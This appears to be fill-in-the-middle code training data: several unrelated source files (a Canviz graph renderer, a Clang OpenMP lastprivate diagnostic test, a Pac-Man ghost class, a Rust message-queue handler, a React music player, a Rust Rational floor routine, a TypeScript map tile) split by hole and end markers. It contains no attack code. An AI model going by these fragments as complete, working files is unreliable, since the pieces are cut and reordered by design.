fontFamily = 'Courier New';
break;
case 'Helvetica':
fontFamily = 'Arial';
break;
default:
// nothing
}
// debug('set font ' + fontSize + 'pt ' + fontFamily);
break;
case 'S': // set style
var style = tokenizer.takeString();
switch (style) {
case 'solid':
case 'filled':
// nothing
break;
case 'dashed':
case 'dotted':
dashStyle = style;
break;
case 'bold':
ctx.lineWidth = 2;
break;
default:
matches = style.match(/^setlinewidth\((.*)\)$/);
if (matches) {
ctx.lineWidth = Number(matches[1]);
} else {
debug('unknown style ' + style);
}
}
break;
default:
debug('unknown token ' + token);
return;
}
if (path) {
this.canviz.drawPath(ctx, path, filled, dashStyle, this);
if (!redrawCanvasOnly) this.bbRect.expandToInclude(path.getBB());
path = undefined;
}
token = tokenizer.takeChars();
}
if (!redrawCanvasOnly) {
var xOff = 0, yOff = 0;
bbDiv.css({
position: 'absolute',
left: Math.round(ctxScale * (this.bbRect.l + xOff) + this.canviz.padding) + 'px',
top: Math.round(ctxScale * (this.bbRect.t + yOff) + this.canviz.padding) + 'px',
width: Math.round(ctxScale * this.bbRect.getWidth()) + 'px',
height: Math.round(ctxScale * this.bbRect.getHeight()) + 'px'
});
}
ctx.restore();
}
}, this));
},
parseColor: function(color) {
var parsedColor = {opacity: 1};
// rgb/rgba
if (/^#(?:[0-9a-f]{2}\s*){3,4}$/i.test(color)) {
return this.canviz.parseHexColor(color);
}
// hsv
var matches = color.match(/^(\d+(?:\.\d+)?)[\s,]+(\d+(?:\.\d+)?)[\s,]+(\d+(?:\.\d+)?)$/);
if (matches) {
parsedColor.canvasColor = parsedColor.textColor = this.canviz.hsvToRgbColor(matches[1], matches[2], matches[3]);
return parsedColor;
}
// named color
var colorScheme = this.getAttr('colorscheme') || 'X11';
var colorName = color;
matches = color.match(/^\/(.*)\/(.*)$/);
if (matches) {
if (matches[1]) {
colorScheme = matches[1];
}
colorName = matches[2];
} else {
matches = color.match(/^\/(.*)$/);
if (matches) {
colorScheme = 'X11';
colorName = matches[1];
}
}
colorName = colorName.toLowerCase();
var colorSchemeName = colorScheme.toLowerCase();
var colorSchemeData = Canviz.prototype.colors[colorSchemeName];
if (colorSchemeData) {
var colorData = colorSchemeData[colorName];
if (colorData) {
return this.canviz.parseHexColor('#' + colorData);
}
}
colorData = Canviz.prototype.colors['fallback'][colorName];
if (colorData) {
return this.canviz.parseHexColor('#' + colorData);
}
if (!colorSchemeData) {
debug('unknown color scheme ' + colorScheme);
}
// unknown
debug('unknown color ' + color + '; color scheme is ' + colorScheme);
parsedColor.canvasColor = parsedColor.textColor = '#000000';
return parsedColor;
}
};<|fim▁end|>
|
break;
case 'C': // set fill color
case 'c': // set pen color
var fill = ('C' == token);
|
<|file_name|>master_taskloop_simd_lastprivate_messages.cpp<|end_file_name|><|fim▁begin|>// RUN: %clang_cc1 -verify=expected,omp45 -fopenmp-version=45 -fopenmp %s -Wuninitialized
// RUN: %clang_cc1 -verify=expected,omp50 -fopenmp-version=50 -fopenmp %s -Wuninitialized
// RUN: %clang_cc1 -verify=expected,omp45 -fopenmp-version=45 -fopenmp-simd %s -Wuninitialized
// RUN: %clang_cc1 -verify=expected,omp50 -fopenmp-version=50 -fopenmp-simd %s -Wuninitialized
typedef void **omp_allocator_handle_t;
extern const omp_allocator_handle_t omp_default_mem_alloc;
extern const omp_allocator_handle_t omp_large_cap_mem_alloc;
extern const omp_allocator_handle_t omp_const_mem_alloc;
extern const omp_allocator_handle_t omp_high_bw_mem_alloc;
extern const omp_allocator_handle_t omp_low_lat_mem_alloc;
extern const omp_allocator_handle_t omp_cgroup_mem_alloc;
extern const omp_allocator_handle_t omp_pteam_mem_alloc;
extern const omp_allocator_handle_t omp_thread_mem_alloc;
void foo() {
}
bool foobool(int argc) {
return argc;
}
struct S1; // expected-note 2 {{declared here}} expected-note 2 {{forward declaration of 'S1'}}
extern S1 a;
class S2 {
mutable int a;
public:
S2() : a(0) {}
S2(S2 &s2) : a(s2.a) {}
const S2 &operator =(const S2&) const;
S2 &operator =(const S2&);
static float S2s; // expected-note {{static data member is predetermined as shared}}
static const float S2sc; // expected-note {{'S2sc' declared here}}
};
const float S2::S2sc = 0;
const S2 b;
const S2 ba[5];
class S3 {
int a;
S3 &operator=(const S3 &s3); // expected-note 2 {{implicitly declared private here}}
public:
S3() : a(0) {}
S3(S3 &s3) : a(s3.a) {}
};
const S3 c; // expected-note {{'c' defined here}}
const S3 ca[5]; // expected-note {{'ca' defined here}}
extern const int f; // expected-note {{'f' declared here}}
class S4 {
int a;
S4(); // expected-note 3 {{implicitly declared private here}}
S4(const S4 &s4);
public:
S4(int v) : a(v) {}
};
class S5 {
int a;
S5() : a(0) {} // expected-note {{implicitly declared private here}}
public:
S5(const S5 &s5) : a(s5.a) {}
S5(int v) : a(v) {}
};
class S6 {
int a;
S6() : a(0) {}
public:
S6(const S6 &s6) : a(s6.a) {}
S6(int v) : a(v) {}
};
S3 h;
#pragma omp threadprivate(h) // expected-note 2 {{defined as threadprivate or thread local}}
template <class I, class C>
int foomain(int argc, char **argv) {
I e(4);
I g(5);
int i, z;
int &j = i;
#pragma omp parallel
#pragma omp master taskloop simd lastprivate // expected-error {{expected '(' after 'lastprivate'}}
for (int k = 0; k < argc; ++k)
++k;
#pragma omp parallel
#pragma omp master taskloop simd lastprivate( // expected-error {{expected expression}} expected-error {{expected ')'}} expected-note {{to match this '('}}
for (int k = 0; k < argc; ++k)
++k;
#pragma omp parallel
#pragma omp master taskloop simd lastprivate() // expected-error {{expected expression}}
for (int k = 0; k < argc; ++k)
++k;
#pragma omp parallel
#pragma omp master taskloop simd lastprivate(argc // expected-error {{expected ')'}} expected-note {{to match this '('}}
for (int k = 0; k < argc; ++k)
++k;
#pragma omp parallel
#pragma omp master taskloop simd lastprivate(argc, // expected-error {{expected expression}} expected-error {{expected ')'}} expected-note {{to match this '('}}
for (int k = 0; k < argc; ++k)
++k;
#pragma omp parallel
#pragma omp master taskloop simd lastprivate(argc > 0 ? argv[1] : argv[2]) // expected-error {{expected variable name}}
for (int k = 0; k < argc; ++k)
++k;
#pragma omp parallel
#pragma omp master taskloop simd lastprivate(argc) allocate , allocate(, allocate(omp_default , allocate(omp_default_mem_alloc, allocate(omp_default_mem_alloc:, allocate(omp_default_mem_alloc: argc, allocate(omp_default_mem_alloc: argv), allocate(argv) // expected-error {{expected '(' after 'allocate'}} expected-error 2 {{expected expression}} expected-error 2 {{expected ')'}} expected-error {{use of undeclared identifier 'omp_default'}} expected-note 2 {{to match this '('}}
for (int k = 0; k < argc; ++k)
++k;
#pragma omp parallel
#pragma omp master taskloop simd lastprivate(S1) // expected-error {{'S1' does not refer to a value}}
for (int k = 0; k < argc; ++k)
++k;
#pragma omp parallel
#pragma omp master taskloop simd lastprivate(conditional: argc) lastprivate(conditional: // expected-error 2 {{use of undeclared identifier 'conditional'}} expected-error {{expected ')'}} expected-note {{to match this '('}}
for (int k = 0; k < argc; ++k)
++k;
#pragma omp parallel
#pragma omp master taskloop simd lastprivate(z, a, b) // expected-error {{lastprivate variable with incomplete type 'S1'}}
for (int k = 0; k < argc; ++k)
++k;
#pragma omp parallel
#pragma omp master taskloop simd lastprivate(argv[1]) // expected-error {{expected variable name}}
for (int k = 0; k < argc; ++k)
++k;
#pragma omp parallel
#pragma omp master taskloop simd lastprivate(e, g) // expected-error 2 {{calling a private constructor of class 'S4'}}
for (int k = 0; k < argc; ++k)
++k;
#pragma omp parallel
#pragma omp master taskloop simd lastprivate(h) // expected-error {{threadprivate or thread local variable cannot be lastprivate}}
for (int k = 0; k < argc; ++k)
++k;
#pragma omp parallel
{
int v = 0;
int i;
#pragma omp master taskloop simd lastprivate(i) allocate(omp_thread_mem_alloc: i) // expected-warning {{allocator with the 'thread' trait access has unspecified behavior on 'master taskloop simd' directive}}
for (int k = 0; k < argc; ++k) {
i = k;
v += i;
}
}
#pragma omp parallel shared(i)
#pragma omp parallel private(i)
#pragma omp master taskloop simd lastprivate(j)
for (int k = 0; k < argc; ++k)
++k;
#pragma omp parallel
#pragma omp master taskloop simd lastprivate(i)
for (int k = 0; k < argc; ++k)
++k;
return 0;
}
void bar(S4 a[2]) {
#pragma omp parallel
#pragma omp master taskloop simd lastprivate(a)
for (int i = 0; i < 2; ++i)
foo();
}
namespace A {
double x;
#pragma omp threadprivate(x) // expected-note {{defined as threadprivate or thread local}}
}
namespace B {
using A::x;
}
int main(int argc, char **argv) {
const int d = 5; // expected-note {{'d' defined here}}
const int da[5] = {0}; // expected-note {{'da' defined here}}
S4 e(4);
S5 g(5);
S3 m;
S6 n(2);
int i, z;
int &j = i;
#pragma omp parallel
#pragma omp master taskloop simd lastprivate // expected-error {{expected '(' after 'lastprivate'}}
for (i = 0; i < argc; ++i)
foo();
#pragma omp parallel
#pragma omp master taskloop simd lastprivate( // expected-error {{expected expression}} expected-error {{expected ')'}} expected-note {{to match this '('}}
for (i = 0; i < argc; ++i)
foo();
#pragma omp parallel
#pragma omp master taskloop simd lastprivate() // expected-error {{expected expression}}
for (i = 0; i < argc; ++i)
foo();
#pragma omp parallel
#pragma omp master taskloop simd lastprivate(argc // expected-error {{expected ')'}} expected-note {{to match this '('}}
for (i = 0; i < argc; ++i)<|fim▁hole|> for (i = 0; i < argc; ++i)
foo();
#pragma omp parallel
#pragma omp master taskloop simd lastprivate(argc > 0 ? argv[1] : argv[2]) // expected-error {{expected variable name}}
for (i = 0; i < argc; ++i)
foo();
#pragma omp parallel
#pragma omp master taskloop simd lastprivate(argc, z)
for (i = 0; i < argc; ++i)
foo();
#pragma omp parallel
#pragma omp master taskloop simd lastprivate(S1) // expected-error {{'S1' does not refer to a value}}
for (i = 0; i < argc; ++i)
foo();
#pragma omp parallel
#pragma omp master taskloop simd lastprivate(a, b, c, d, f) // expected-error {{lastprivate variable with incomplete type 'S1'}} expected-error 1 {{const-qualified variable without mutable fields cannot be lastprivate}} expected-error 2 {{const-qualified variable cannot be lastprivate}}
for (i = 0; i < argc; ++i)
foo();
#pragma omp parallel
#pragma omp master taskloop simd lastprivate(argv[1]) // expected-error {{expected variable name}}
for (i = 0; i < argc; ++i)
foo();
#pragma omp parallel
#pragma omp master taskloop simd lastprivate(2 * 2) // expected-error {{expected variable name}}
for (i = 0; i < argc; ++i)
foo();
#pragma omp parallel
#pragma omp master taskloop simd lastprivate(ba)
for (i = 0; i < argc; ++i)
foo();
#pragma omp parallel
#pragma omp master taskloop simd lastprivate(ca) // expected-error {{const-qualified variable without mutable fields cannot be lastprivate}}
for (i = 0; i < argc; ++i)
foo();
#pragma omp parallel
#pragma omp master taskloop simd lastprivate(da) // expected-error {{const-qualified variable cannot be lastprivate}}
for (i = 0; i < argc; ++i)
foo();
int xa;
#pragma omp parallel
#pragma omp master taskloop simd lastprivate(xa) // OK
for (i = 0; i < argc; ++i)
foo();
#pragma omp parallel
#pragma omp master taskloop simd lastprivate(S2::S2s) // expected-error {{shared variable cannot be lastprivate}}
for (i = 0; i < argc; ++i)
foo();
#pragma omp parallel
#pragma omp master taskloop simd lastprivate(S2::S2sc) // expected-error {{const-qualified variable cannot be lastprivate}}
for (i = 0; i < argc; ++i)
foo();
#pragma omp parallel
#pragma omp master taskloop simd safelen(5)
for (i = 0; i < argc; ++i)
foo();
#pragma omp parallel
#pragma omp master taskloop simd lastprivate(e, g) // expected-error {{calling a private constructor of class 'S4'}} expected-error {{calling a private constructor of class 'S5'}}
for (i = 0; i < argc; ++i)
foo();
#pragma omp parallel
#pragma omp master taskloop simd lastprivate(m) // expected-error {{'operator=' is a private member of 'S3'}}
for (i = 0; i < argc; ++i)
foo();
#pragma omp parallel
#pragma omp master taskloop simd lastprivate(h) // expected-error {{threadprivate or thread local variable cannot be lastprivate}}
for (i = 0; i < argc; ++i)
foo();
#pragma omp parallel
#pragma omp master taskloop simd lastprivate(B::x) // expected-error {{threadprivate or thread local variable cannot be lastprivate}}
for (i = 0; i < argc; ++i)
foo();
#pragma omp parallel
#pragma omp master taskloop simd private(xa), lastprivate(xa) // expected-error {{private variable cannot be lastprivate}} expected-note {{defined as private}}
for (i = 0; i < argc; ++i)
foo();
#pragma omp parallel
#pragma omp master taskloop simd lastprivate(i) // omp45-note {{defined as lastprivate}}
for (i = 0; i < argc; ++i) // omp45-error {{loop iteration variable in the associated loop of 'omp master taskloop simd' directive may not be lastprivate, predetermined as linear}}
foo();
#pragma omp parallel private(xa)
#pragma omp master taskloop simd lastprivate(xa)
for (i = 0; i < argc; ++i)
foo();
#pragma omp parallel reduction(+ : xa)
#pragma omp master taskloop simd lastprivate(xa)
for (i = 0; i < argc; ++i)
foo();
#pragma omp parallel
#pragma omp master taskloop simd lastprivate(j)
for (i = 0; i < argc; ++i)
foo();
#pragma omp parallel
#pragma omp master taskloop simd firstprivate(m) lastprivate(m) // expected-error {{'operator=' is a private member of 'S3'}}
for (i = 0; i < argc; ++i)
foo();
#pragma omp parallel
#pragma omp master taskloop simd lastprivate(n) firstprivate(n) // OK
for (i = 0; i < argc; ++i)
foo();
static int si;
#pragma omp master taskloop simd lastprivate(si) // OK
for (i = 0; i < argc; ++i)
si = i + 1;
return foomain<S4, S5>(argc, argv); // expected-note {{in instantiation of function template specialization 'foomain<S4, S5>' requested here}}
}<|fim▁end|>
|
foo();
#pragma omp parallel
#pragma omp master taskloop simd lastprivate(argc, // expected-error {{expected expression}} expected-error {{expected ')'}} expected-note {{to match this '('}}
|
<|file_name|>Ghosts.py<|end_file_name|><|fim▁begin|>from MakeGraph import MakeGraph
from Moving_pacman import PacMan
import pygame
class Ghost(MakeGraph):
index = 0
def __init__(self,class_graph,x,y):
Ghost.index = Ghost.index + 1
self.all_nodes = class_graph.get_nodes()
self.paths_to_all_nodes = class_graph.get_shortest_path()
self.path = []
self.hunting = False
self.name_image_u = "Ghost_red_up"
self.name_image_d = "Ghost_red_down"
self.name_image_l = "Ghost_red_left"
self.name_image_r = "Ghost_red_right"
self.name_image = self.name_image_u
self.cords={'x': x, 'y': y}
# {'x': 92, 'y': 161}
self.index = Ghost.index
def next_hop(self):
if self.path:
return self.path[0]
return []
def find_ghost_cords(self):
ghost_x = int(self.cords['y']/23)
ghost_y = int(self.cords['x']/23)
return (ghost_x,ghost_y)
def get_pictures(self):
if self.index == 0 :
self.name_image_u = "Ghost_red_up"
self.name_image_d = "Ghost_red_down"
self.name_image_l = "Ghost_red_left"
self.name_image_r = "Ghost_red_right"
if self.index == 1:
self.name_image_u = "Ghost_orange_up"
self.name_image_d = "Ghost_orange_down"
self.name_image_l = "Ghost_orange_left"
self.name_image_r = "Ghost_orange_right"
if self.index == 2:
self.name_image_u = "Ghost_pink_up"
self.name_image_d = "Ghost_pink_down"
self.name_image_l = "Ghost_pink_left"
self.name_image_r = "Ghost_pink_right"
if self.index == 3:
self.name_image_u = "Ghost_cyan_up"
self.name_image_d = "Ghost_cyan_down"
self.name_image_l = "Ghost_cyan_left"
self.name_image_r = "Ghost_cyan_right"
def find_closest_nodes(self):
closest_nodes =[]
ghost_x = int(self.cords['x']/23)
ghost_y = int(self.cords['y']/23)
vertex = (ghost_y,ghost_x)
queue = [vertex]
Visited = [vertex]
# if vertex in all_Nodes:
# all_Nodes.remove(vertex)
while queue != []:
new_v = queue.pop(0)
new_v_adj = [(new_v[0] - 1, new_v[1]),
(new_v[0] + 1, new_v[1]),
(new_v[0], new_v[1] - 1),
(new_v[0], new_v[1] + 1)]
for v_adj in new_v_adj:
if self.is_p_vertex(v_adj) and v_adj not in Visited:
if v_adj in self.all_nodes:
closest_nodes.append((v_adj[1],v_adj[0]))
else:
queue.append(v_adj)
Visited.append(v_adj)
return closest_nodes
def find_closest_vertex(self):
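        # BFS from the ghost's current tile; returns the list of tiles leading to the
        # nearest graph node, or [] if the ghost is already standing on one.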
closest_nodes =[]
ghost_x = int(self.cords['x']/23)
ghost_y = int(self.cords['y']/23)
vertex = (ghost_y,ghost_x)
queue = [vertex]
map_to_a_vertex = {}
visited_n = [vertex]
# print (self.all_nodes)
if vertex in self.all_nodes:
return []
while queue != []:
new_v = queue.pop(0)
new_v_adj = [(new_v[0] - 1, new_v[1]),
(new_v[0] + 1, new_v[1]),
(new_v[0], new_v[1] - 1),
(new_v[0], new_v[1] + 1)]
for v_adj in new_v_adj:
map_to_a_vertex[v_adj] = new_v
if v_adj in self.all_nodes:
full_path = [v_adj]<|fim▁hole|> while map_to_a_vertex[v_adj] != vertex:
v_adj = map_to_a_vertex[v_adj]
full_path.insert(0,v_adj)
return full_path
if MakeGraph.is_p_vertex(self,v_adj) and v_adj not in visited_n:
queue.append(v_adj)
visited_n.append(v_adj)
def ghost_move(self, pacman_vertex, pacman_cords):
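        # Start hunting once the ghost reaches Pac-Man's graph vertex; while hunting, chase
        # tile by tile (search_eat), otherwise walk to the nearest node and then follow the
        # precomputed shortest path towards Pac-Man's vertex (each step repeated twice).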
my_cords = (int(self.cords['y']/23),int(self.cords['x']/23))
if my_cords == pacman_vertex:
self.hunting = True
if self.hunting == True:
self.path = self.search_eat(pacman_cords)
if not self.path:
if self.hunting == True:
self.hunting = False
if self.find_closest_vertex() != []:
self.path = self.find_closest_vertex()
else:
for i in self.paths_to_all_nodes[my_cords][pacman_vertex]:
self.path.extend(2*[i])
def ghost_make_move(self):
# if not self.path:
# self.ghost_move(screen,pacman_vertex,pacman_cords)
new_step = self.path.pop(0)
old_step = (int(self.cords['y'] / 23),int(self.cords['x'])/23)
if old_step[0] == new_step[0] and old_step[1]<new_step[1]:
self.name_image = self.name_image_r
if old_step[0] == new_step[0] and old_step[1]>new_step[1]:
self.name_image = self.name_image_l
if old_step[0] < new_step[0] and old_step[1]==new_step[1]:
self.name_image = self.name_image_d
if old_step[0] > new_step[0] and old_step[1]==new_step[1]:
self.name_image = self.name_image_u
self.cords['y'] = new_step[0]*23
self.cords['x'] = new_step[1]*23
def search_eat(self,pacman_cords):
closest_nodes =[]
# pacman_x = int(pacman_cords['x']/23)
# pacman_y = int(pacman_cords['y']/23)
ghost_x = int(self.cords['x']/23)
ghost_y = int(self.cords['y']/23)
vertex = (ghost_y,ghost_x)
queue = [vertex]
map_to_a_vertex = {}
visited_n = [vertex]
if vertex == pacman_cords:
return []
while queue != []:
new_v = queue.pop(0)
new_v_adj = [(new_v[0] - 1, new_v[1]),
(new_v[0] + 1, new_v[1]),
(new_v[0], new_v[1] - 1),
(new_v[0], new_v[1] + 1)]
for v_adj in new_v_adj:
if self.is_p_vertex(v_adj) and v_adj not in visited_n:
queue.append(v_adj)
visited_n.append(v_adj)
map_to_a_vertex[v_adj] = new_v
if v_adj == pacman_cords:
# map_to_a_vertex[v_adj] = new_v
# print(map_to_a_vertex)
# print("abc",v_adj,new_v)
while map_to_a_vertex[v_adj] != vertex:
# print("abc",v_adj)
v_adj = map_to_a_vertex[v_adj]
return [v_adj]
return []
def draw_ghost(self,screen):
ghost = pygame.image.load("Ghosts/Ghost_cyan_down.png")
# print(self.find_closest_vertex())
        self.ghost_move((14,13),(16,14))
# p = self.path[-1]
# pygame.draw.rect(screen, (124, 124, 0),
# (p[1]* 23, p[0] * 23, 23, 23))
screen.blit(ghost,(self.cords['x'], self.cords['y']))<|fim▁end|>
| |
<|file_name|>mq_handler.rs<|end_file_name|><|fim▁begin|>// Copyright Cryptape Technologies LLC.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
use crate::helper::{RpcMap, TransferType};
use jsonrpc_proto::response::OutputExt;
use jsonrpc_types::rpc_response::Output;
use libproto::router::{MsgType, RoutingKey, SubModules};
use libproto::Message;
use libproto::TryFrom;
use serde_json;
#[derive(Default)]
pub struct MqHandler {
responses: RpcMap,
}
impl MqHandler {
pub fn new(responses: RpcMap) -> Self {
MqHandler { responses }
}
pub fn handle(&mut self, key: &str, body: &[u8]) -> Result<(), ()> {
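        // Decode the protobuf message; for *::Response routing keys, look up the waiting
        // HTTP or WebSocket sender by request_id and forward the JSON-RPC output to it.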
trace!("get msg from routing_key {}", key);
let mut msg = Message::try_from(body).map_err(|e| {
error!("try_from: {:?}", e);
})?;
match RoutingKey::from(key) {
routing_key!(Auth >> Response)
| routing_key!(Chain >> Response)
| routing_key!(Executor >> Response)
| routing_key!(Jsonrpc >> Response)
| routing_key!(Net >> Response) => {
let content = msg.take_response().ok_or_else(|| {
error!("empty response message");
})?;<|fim▁hole|> let resp = {
let request_id = &content.request_id;
trace!("from response request_id {:?}", request_id);
self.responses.lock().remove(request_id).ok_or_else(|| {
warn!("receive lost request_id {:?}", request_id);
})?
};
match resp {
TransferType::HTTP((req_info, sender)) => {
sender
.send(Output::from_res_info(content, req_info))
.map_err(|e| {
error!("http: {:?}", e);
})?;
}
TransferType::WEBSOCKET((req_info, sender)) => {
let json_body =
serde_json::to_string(&Output::from_res_info(content, req_info))
.map_err(|e| {
error!("ws: {:?}", e);
})?;
sender.send(json_body).map_err(|e| {
error!("ws: {:?}", e);
})?;
}
};
}
_ => {
warn!("receive unexpect key {}", key);
}
};
Ok(())
}
}<|fim▁end|>
| |
<|file_name|>Player.js<|end_file_name|><|fim▁begin|>import React, {Component} from 'react';
import {bindActionCreators} from 'redux';
import {connect} from 'react-redux';
import {initialPlay, nextTrack, togglePlaying} from 'redux/modules/player';
import {starTrack, unstarTrack} from 'redux/modules/starred';
import {isTrackStarred} from 'utils/track';
const classNames = require('classnames');
const styles = require('./Player.scss');
@connect(
state => ({player: state.player, starred: state.starred}),
dispatch => bindActionCreators({initialPlay, nextTrack, starTrack, unstarTrack, togglePlaying}, dispatch))
export default class Player extends Component {
constructor(props) {
super(props);
this.handleToggleClick = this.handleToggleClick.bind(this);
this.handleNextTrack = this.handleNextTrack.bind(this);
this.handleStarTrack = this.handleStarTrack.bind(this);
this.handleStarTrackClick = this.handleStarTrackClick.bind(this);
this.isStarred = this.isStarred.bind(this);
this.isTrackSelected = this.isTrackSelected.bind(this);
this.renderInfo = this.renderInfo.bind(this);
}
handleToggleClick() {
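    // No track loaded yet: trigger the initial play action; otherwise just
    // toggle play/pause on the current track.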
const {initialPlay, player, togglePlaying} = this.props; // eslint-disable-line no-shadow
const {currentTrack} = player;
if (currentTrack) {
togglePlaying();
} else {
initialPlay();
}
}
handleNextTrack() {
if (!this.isTrackSelected()) return;
const {nextTrack} = this.props; // eslint-disable-line no-shadow
nextTrack();
}
handleStarTrack() {
const {player, starTrack} = this.props; // eslint-disable-line no-shadow
const {currentTrack} = player;
starTrack(currentTrack);
console.log('starrr');
}
handleStarTrackClick() {
if (this.isStarred()) {
this.handleUnstarTrack();
} else {
this.handleStarTrack();
}
}
handleUnstarTrack() {
const {player, unstarTrack} = this.props; // eslint-disable-line no-shadow
const {currentTrack} = player;
unstarTrack(currentTrack);
console.log('unstarrr');
}
isStarred() {
const {player, starred} = this.props;
const {currentTrack} = player;
if (!this.isTrackSelected()) return false;
const {starredTracks} = starred;
return isTrackStarred(currentTrack, starredTracks);
}
isTrackSelected() {
const {player} = this.props;
const {currentTrack} = player;
return currentTrack ? true : false;
}
renderInfo() {
const {player} = this.props;
const {currentTrack} = player;
if (!currentTrack) return '';
const {
data: {
title,
artist: {
name: artistName,
url: artistUrl
},
track: {
url: trackUrl
}
}
} = currentTrack;
return (
<h3 className={styles['info__text']}>
<a className={styles['info__text__title']} href={trackUrl} target="_blank">{title}</a>
<span className={styles['info__text__divider']}></span>
<a className={styles['info__text__artist']} href={artistUrl} target="_blank">{artistName}</a>
</h3>
);
}
render() {
const {player} = this.props;
const {
playing: isPlaying
} = player;
const isStarred = this.isStarred();
console.log('is starred?', isStarred);
const trackIsSelected = this.isTrackSelected();
const rootClasses = classNames(
styles['Player'],
{
[styles['state--empty']]: !trackIsSelected,
[styles['state--playing']]: isPlaying,
[styles['state--starred']]: isStarred,
[styles['state--disabled']]: !trackIsSelected
}
);
return (
<div className={rootClasses}>
<div className={styles['info']}>
{this.renderInfo()}
</div>
<div className={styles['controls']}>
<div className={[styles['btn'], styles['btn--star']].join(' ')} onClick={this.handleStarTrackClick}>
<div className={styles['btnIcon']}></div>
</div>
<div className={[styles['btn'], styles['btn--share']].join(' ')}>
<div className={styles['btnIcon']}></div>
</div>
<div className={[styles['btn'], styles['btn--toggle']].join(' ')} onClick={this.handleToggleClick}>
<div className={styles['btnIcon']}></div>
</div><|fim▁hole|> </div>
</div>
</div>
);
}
}
Player.propTypes = {
initialPlay: React.PropTypes.func,
nextTrack: React.PropTypes.func,
player: React.PropTypes.object,
starred: React.PropTypes.object,
starTrack: React.PropTypes.func,
unstarTrack: React.PropTypes.func,
togglePlaying: React.PropTypes.func,
};<|fim▁end|>
|
<div className={[styles['btn'], styles['btn--skip']].join(' ')} onClick={this.handleNextTrack}>
<div className={styles['btnIcon']}></div>
|
<|file_name|>floor.rs<|end_file_name|><|fim▁begin|>use malachite_base::num::arithmetic::traits::{DivRound, DivRoundAssign, Floor, FloorAssign};
use malachite_base::num::basic::traits::One;
use malachite_base::rounding_modes::RoundingMode;
use malachite_nz::integer::Integer;
use malachite_nz::natural::Natural;
use std::mem::swap;
use Rational;
impl Floor for Rational {
type Output = Integer;
/// Finds the floor of a `Rational`, taking the `Rational` by value.
///<|fim▁hole|> /// $$
/// f(x) = \lfloor x \rfloor.
/// $$
///
/// # Worst-case complexity
/// TODO
///
/// # Examples
/// ```
/// extern crate malachite_base;
/// extern crate malachite_q;
///
/// use malachite_base::num::arithmetic::traits::Floor;
/// use malachite_base::num::basic::traits::Zero;
/// use malachite_q::Rational;
///
/// assert_eq!(Rational::ZERO.floor(), 0);
/// assert_eq!(Rational::from_signeds(22, 7).floor(), 3);
/// assert_eq!(Rational::from_signeds(-22, 7).floor(), -4);
/// ```
fn floor(self) -> Integer {
if self.sign {
Integer::from(self.numerator / self.denominator)
} else {
Integer::from_sign_and_abs(
false,
self.numerator
.div_round(self.denominator, RoundingMode::Ceiling),
)
}
}
}
impl<'a> Floor for &'a Rational {
type Output = Integer;
/// Finds the floor of a `Rational`, taking the `Rational` by reference.
///
/// $$
/// f(x) = \lfloor x \rfloor.
/// $$
///
/// # Worst-case complexity
/// TODO
///
/// # Examples
/// ```
/// extern crate malachite_base;
/// extern crate malachite_q;
///
/// use malachite_base::num::arithmetic::traits::Floor;
/// use malachite_base::num::basic::traits::Zero;
/// use malachite_q::Rational;
/// use std::str::FromStr;
///
/// assert_eq!((&Rational::ZERO).floor(), 0);
/// assert_eq!((&Rational::from_signeds(22, 7)).floor(), 3);
/// assert_eq!((&Rational::from_signeds(-22, 7)).floor(), -4);
/// ```
fn floor(self) -> Integer {
if self.sign {
Integer::from(&self.numerator / &self.denominator)
} else {
Integer::from_sign_and_abs(
false,
(&self.numerator).div_round(&self.denominator, RoundingMode::Ceiling),
)
}
}
}
impl FloorAssign for Rational {
/// Replaces a `Rational` with its floor.
///
/// $$
/// x \gets \lfloor x \rfloor.
/// $$
///
/// # Worst-case complexity
/// TODO
///
/// # Examples
/// ```
/// extern crate malachite_base;
/// extern crate malachite_q;
///
/// use malachite_base::num::arithmetic::traits::FloorAssign;
/// use malachite_base::num::basic::traits::Zero;
/// use malachite_q::Rational;
/// use std::str::FromStr;
///
/// let mut x = Rational::ZERO;
/// x.floor_assign();
/// assert_eq!(x, 0);
///
/// let mut x = Rational::from_signeds(22, 7);
/// x.floor_assign();
/// assert_eq!(x, 3);
///
/// let mut x = Rational::from_signeds(-22, 7);
/// x.floor_assign();
/// assert_eq!(x, -4);
/// ```
fn floor_assign(&mut self) {
let mut d = Natural::ONE;
swap(&mut self.denominator, &mut d);
if self.sign {
self.numerator /= d;
} else {
self.numerator.div_round_assign(d, RoundingMode::Ceiling);
if !self.sign && self.numerator == 0 {
self.sign = true;
}
}
}
}<|fim▁end|>
| |
<|file_name|>Tile.ts<|end_file_name|><|fim▁begin|>import Point from "esri/geometry/Point";
import Graphic from "esri/Graphic";
import { quantizePoint } from "../common/quantizationUtils";
import TileBase from "../common/TileBase";<|fim▁hole|>
// --------------------------------------------------------------------------
//
// Lifecycle
//
// --------------------------------------------------------------------------
constructor(readonly tileInfo: TileInfo, readonly isDebug = false) {
super(tileInfo);
}
// --------------------------------------------------------------------------
//
// Public methods
//
// --------------------------------------------------------------------------
setData(features: Graphic[]): void {
// we have to quantize the graphics for the tile
if (this.isDebug) {
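      // Debug mode emits a single hard-coded quad so tile rendering can be
      // verified without real feature data.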
this.tileData = {
vertexData: new Float32Array([10, 10, 10, 502, 502, 10, 502, 502]),
indexData: new Uint32Array([0, 1, 2, 1, 3, 2]),
elementCount: 6
};
return;
}
if (!features || features.length === 0) {
this.tileData = { vertexData: null, indexData: null, elementCount: 0 };
return;
}
const tileInfo = this.tileInfo;
const quantizedPoints = this._quantizeGraphics(features, {
originPosition: "upper-left",
scale: [tileInfo.resolution, tileInfo.resolution],
translate: [tileInfo.bounds[0], tileInfo.bounds[3]]
});
this.tileData = this._createMesh(features, quantizedPoints);
}
// --------------------------------------------------------------------------
//
// Private methods
//
// --------------------------------------------------------------------------
private _quantizeGraphics(
graphics: Graphic[],
transform: QuantizationTransform
): IPoint[] {
const quantizedPoints: IPoint[] = new Array<IPoint>(graphics.length);
for (let index = 0; index < graphics.length; index++) {
const graphic = graphics[index];
const geometry = graphic.geometry;
if (geometry) {
quantizedPoints[index] = quantizePoint(transform, geometry as Point);
}
}
return quantizedPoints;
}
private _createMesh(features: Graphic[], quantizedPoints: IPoint[]): TileData {
if (!features) {
return null;
}
// create TypedArrays from the features (for now use position and offset only)
